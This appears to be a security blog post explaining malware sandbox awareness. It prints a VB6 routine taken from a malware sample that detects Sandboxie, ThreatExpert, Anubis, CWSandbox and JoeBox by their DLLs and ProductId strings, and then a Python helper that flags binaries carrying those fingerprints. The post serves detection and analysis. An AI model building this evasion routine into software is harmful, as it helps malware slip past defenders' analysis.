Recently, malware has evolved new ways of dodging detection, such as sandbox awareness: if the malware finds that it is being executed inside one of the well-known sandboxes, it stops executing.
Here is a small piece of code taken from a malware sample and readapted:
' Win32 declarations the routine needs (omitted in the original listing)
Private Const TH32CS_SNAPMODULE As Long = &H8
Private Const HKEY_LOCAL_MACHINE As Long = &H80000002
Private Const KEY_READ As Long = &H20019      ' read access is all a value query needs
Private Const REG_SZ As Long = 1
Private Type MODULEENTRY32
    dwSize As Long
    th32ModuleID As Long
    th32ProcessID As Long
    GlblcntUsage As Long
    ProccntUsage As Long
    modBaseAddr As Long
    modBaseSize As Long
    hModule As Long
    szModule As String * 256      ' MAX_MODULE_NAME32 + 1
    szExePath As String * 260     ' MAX_PATH
End Type
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As Long, lpme As MODULEENTRY32) As Long
Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As Long, lpme As MODULEENTRY32) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32" (ByVal hKey As Long) As Long

Public Function IsInSandbox() As Boolean
    Dim hKey As Long, hOpen As Long, hQuery As Long, hSnapShot As Long
    Dim me32 As MODULEENTRY32
    Dim szBuffer As String * 128
    ' Check 1: walk the modules loaded into this process looking for sandbox DLLs
    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId)
    me32.dwSize = Len(me32)
    Module32First hSnapShot, me32
    Do While Module32Next(hSnapShot, me32) <> 0
        If InStr(1, LCase(me32.szModule), "sbiedll.dll") > 0 Then      ' Sandboxie
            IsInSandbox = True
        ElseIf InStr(1, LCase(me32.szModule), "dbghelp.dll") > 0 Then  ' ThreatExpert
            IsInSandbox = True
        End If
    Loop
    CloseHandle hSnapShot
    ' Check 2: compare the Windows ProductId with values known from sandbox images
    If IsInSandbox = False Then
        hOpen = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion", 0, KEY_READ, hKey)
        If hOpen = 0 Then
            hQuery = RegQueryValueEx(hKey, "ProductId", 0, REG_SZ, szBuffer, 128)
            If hQuery = 0 Then
                If InStr(1, szBuffer, "76487-337-8429955-22614") > 0 Then      ' Anubis
                    IsInSandbox = True
                ElseIf InStr(1, szBuffer, "76487-644-3177037-23510") > 0 Then  ' CWSandbox
                    IsInSandbox = True
                ElseIf InStr(1, szBuffer, "55274-640-2673064-23950") > 0 Then  ' JoeBox
                    IsInSandbox = True
                End If
            End If
            RegCloseKey hKey      ' only close a key that was actually opened
        End If
    End If
End Function
It detects Sandboxie, ThreatExpert, JoeBox, CWSandbox and Anubis by checking the Windows ProductId or the presence of characteristic DLLs such as sbiedll.dll and dbghelp.dll.
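The defender's counterpart, added here as an example (it is not code from the post or from the malware): a small Python triage helper that statically scans a binary for the same fingerprints the snippet above looks up, so an analyst can flag a sample as sandbox-aware before it is sent to dynamic analysis. The module names and ProductId strings come from the snippet; the API-name list, the scoring and the sample bytes are my own constructed assumptions. It searches for both ASCII and UTF-16LE encodings, because VB6 stores string literals as UTF-16LE in the compiled executable.

```python
"""Static triage: flag binaries embedding the sandbox fingerprints used by the VB snippet.

Constructed example, not the post's code. Scans for ASCII and UTF-16LE encodings
of each indicator because VB6 string literals end up as UTF-16LE in the binary.
"""
from dataclasses import dataclass, field
from typing import Dict, List

# Indicator strings taken from the snippet on the page.
SANDBOX_MODULES = {
    "sbiedll.dll": "Sandboxie",
    "dbghelp.dll": "ThreatExpert",   # weak on its own: dbghelp.dll is a normal Windows DLL
}
SANDBOX_PRODUCT_IDS = {
    "76487-337-8429955-22614": "Anubis",
    "76487-644-3177037-23510": "CWSandbox",
    "55274-640-2673064-23950": "JoeBox",
}
# Import names the snippet relies on (assumption: the ANSI registry export is used).
ENUM_APIS = ("CreateToolhelp32Snapshot", "Module32Next", "RegQueryValueExA")


@dataclass
class TriageResult:
    sandboxes: Dict[str, str] = field(default_factory=dict)  # sandbox name -> indicator hit
    apis: List[str] = field(default_factory=list)             # enumeration APIs found

    @property
    def score(self) -> int:
        """One point per sandbox fingerprint, plus one if the whole API triad is present."""
        return len(self.sandboxes) + (1 if len(self.apis) == len(ENUM_APIS) else 0)


def _encodings(s: str) -> List[bytes]:
    """Both byte forms a VB6 literal may take inside a PE file."""
    return [s.encode("ascii"), s.encode("utf-16-le")]


def scan_bytes(data: bytes) -> TriageResult:
    result = TriageResult()
    # bytes.lower() touches only ASCII letters, so the \x00 bytes of UTF-16LE survive
    # and a lowercase needle matches regardless of the case used in the binary.
    haystack = data.lower()
    for needle, name in {**SANDBOX_MODULES, **SANDBOX_PRODUCT_IDS}.items():
        if any(enc in haystack for enc in _encodings(needle.lower())):
            result.sandboxes[name] = needle
    # Import names are case-sensitive ASCII in the PE import table: search raw data.
    result.apis = [api for api in ENUM_APIS if api.encode("ascii") in data]
    return result


def scan_file(path: str) -> TriageResult:
    with open(path, "rb") as fh:
        return scan_bytes(fh.read())


# Constructed sample: a fake header, a UTF-16LE Sandboxie DLL name, an ASCII Anubis
# ProductId and the three import names, separated by NUL padding.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 16
    + "SbieDll.dll".encode("utf-16-le")
    + b"\x00" * 8
    + b"76487-337-8429955-22614"
    + b"\x00" * 8
    + b"CreateToolhelp32Snapshot\x00Module32Next\x00RegQueryValueExA\x00"
)

if __name__ == "__main__":
    r = scan_bytes(SAMPLE)
    print("sandboxes:", r.sandboxes, "apis:", r.apis, "score:", r.score)
```

Only a score above one is worth an analyst's attention: dbghelp.dll by itself appears in plenty of benign software, and the ProductId strings are the stronger signal because no legitimate program has a reason to carry them.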